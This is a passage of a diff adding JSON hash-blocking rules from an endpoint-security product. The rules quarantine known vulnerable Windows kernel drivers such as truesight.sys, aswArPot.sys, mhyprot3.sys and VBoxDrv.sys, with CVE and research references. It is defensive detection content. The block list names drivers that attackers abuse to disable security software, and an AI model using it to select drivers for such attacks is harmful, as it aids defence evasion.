+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3fa8f5c8094a6c6936faff1d1faa02fd489482f21c288e6c700446ade5c20be",
+ "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce879408-ac73-514b-8ec4-8f443abf91d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486294Z",
+ "creation_date": "2026-03-23T11:45:31.486297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e2985dd57d6797f48b4358ffbc5e9f9e01fa27ba9e2d609f99029b30b80e5b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce9083f8-3e43-5a4a-b2f2-80bcc2a6c595",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817087Z",
+ "creation_date": "2026-03-23T11:45:30.817090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817095Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef438a754fd940d145cc5d658ddac666a06871d71652b258946c21efe4b7e517",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ce9ff95b-84a7-57a6-ad14-5e8f1c3e60e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480590Z",
+ "creation_date": "2026-03-23T11:45:31.480594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e25f7e8d25659647fea1d520c454f16f7aa113f0e556934e8b573c3c440ce717",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ceb3f76f-8919-5e6a-bedf-4d16a0703bcd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452157Z",
+ "creation_date": "2026-03-23T11:45:30.452160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3d479d7efd0f6b502d6829b893711bdd51aac07d66326b41ef5451bafdfcb29",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ceb86114-188f-5df1-b666-700dea293eb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969576Z",
+ "creation_date": "2026-03-23T11:45:29.969578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cb639c7b27fec183ac475c91a66d91f24b500a5fa5dcabdd6920931626dfd93",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cebf7df6-3c8c-5f01-a07f-61e6154863b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140926Z",
+ "creation_date": "2026-03-23T11:45:31.140928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1dfbf17efbf37083968567ee13ff832e0e23a27eb9244d5416e52bdae53d53a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cec890c3-fb42-5da0-99ad-bd770dcb7e44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148537Z",
+ "creation_date": "2026-03-23T11:45:31.148539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e849ec0c64d3d01309acf125f76c8f526aa9e5eb34cfeb85967a3a04be77ba80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cec8ef06-547d-57fb-9ec0-b71509ed5266",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499775Z",
+ "creation_date": "2026-03-23T11:45:31.499779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499787Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d099b7787a3cd78eb5ef0bcff982a8e6964cd792f96069110ef7d1101603230f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ced0ebd2-148a-586f-b79e-54d26d63b8d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495076Z",
+ "creation_date": "2026-03-23T11:45:31.495078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ccd62ae166e2ca48bdadc835e56fadc1aa3d239b408f998d60c5e19d7febe0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ced80048-a28f-528d-9c0c-ebd741b90cf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822899Z",
+ "creation_date": "2026-03-23T11:45:30.822901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822907Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "442d506c1ac1f48f6224f0cdd64590779aee9c88bdda2f2cc3169b862cba1243",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ced9de67-316d-5471-a0b9-ab12b4e36070",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810344Z",
+ "creation_date": "2026-03-23T11:45:31.810346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c2577d760341250044463abbf12c9bfce8556135127851a14fbe95cd404ad3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cedd73e0-328a-52b0-8196-a9ce43909c38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146095Z",
+ "creation_date": "2026-03-23T11:45:31.146097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37a729ead982b58a07840bf0e2cc8fcbfb2c1b446b0cd7bd1b1dd2b1ce18eda4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cede6bfa-d3fc-5a2c-a59d-5281bfb3b7d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826595Z",
+ "creation_date": "2026-03-23T11:45:31.826597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "161b2e84ee61f38f197d03d5c66bebb13d5722d4bd3e326e52ce40181b347cff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cef6c5e5-e553-5963-bcb1-7b4b49ab61c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816454Z",
+ "creation_date": "2026-03-23T11:45:30.816457Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec81b458b41c9732341ec8cde57b9b7c7bb776b3bc08f45f2c815c3692072d04",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf026a4d-e788-5d2a-a157-7354c9e53923",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144038Z",
+ "creation_date": "2026-03-23T11:45:31.144040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1f0efdda4b3e0a25457fc1a9237178ba2d0694995bad02037a66817dba0cd39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf1e4dbc-121f-5771-9935-0a2131b1108a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608457Z",
+ "creation_date": "2026-03-23T11:45:29.608459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26f41e4268be59f5de07552b51fa52d18d88be94f8895eb4a16de0f3940cf712",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf215a79-7265-5fbc-9ca3-891dc9afe758",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833012Z",
+ "creation_date": "2026-03-23T11:45:30.833015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "403e06568d2765f574287db1ce1e706ee56234df7da5d57d963cdd2e8c50d72d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf29956d-0174-507e-8cc3-68436f27a990",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457776Z",
+ "creation_date": "2026-03-23T11:45:30.457779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457787Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6feb3f4932387df7598e29d4f5bdacec0b9ce98db3f51d96fc4ffdcc6eb10e1",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf413540-5fe9-517a-8470-0f3946ba545e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618168Z",
+ "creation_date": "2026-03-23T11:45:29.618170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ef8949637cb947f1a4e1d4e68d31d1385a600d1b1054b53e7417767461fafa7",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf42b340-1c68-5cef-ae74-158eade282dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474712Z",
+ "creation_date": "2026-03-23T11:45:30.474715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7699613119b25fc5886305e43ff556f8d53560cfa7707ab456f3165ba4ea374b",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf4551db-2202-5282-906c-a1dcd7b13132",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141328Z",
+ "creation_date": "2026-03-23T11:45:31.141330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff9ad483752fcd68f51fa798194a3b6df55fb4332ca10cb24bb7e98b168396b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cf519a83-54d3-501f-aca9-a94796c94a66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968476Z",
+ "creation_date": "2026-03-23T11:45:29.968478Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
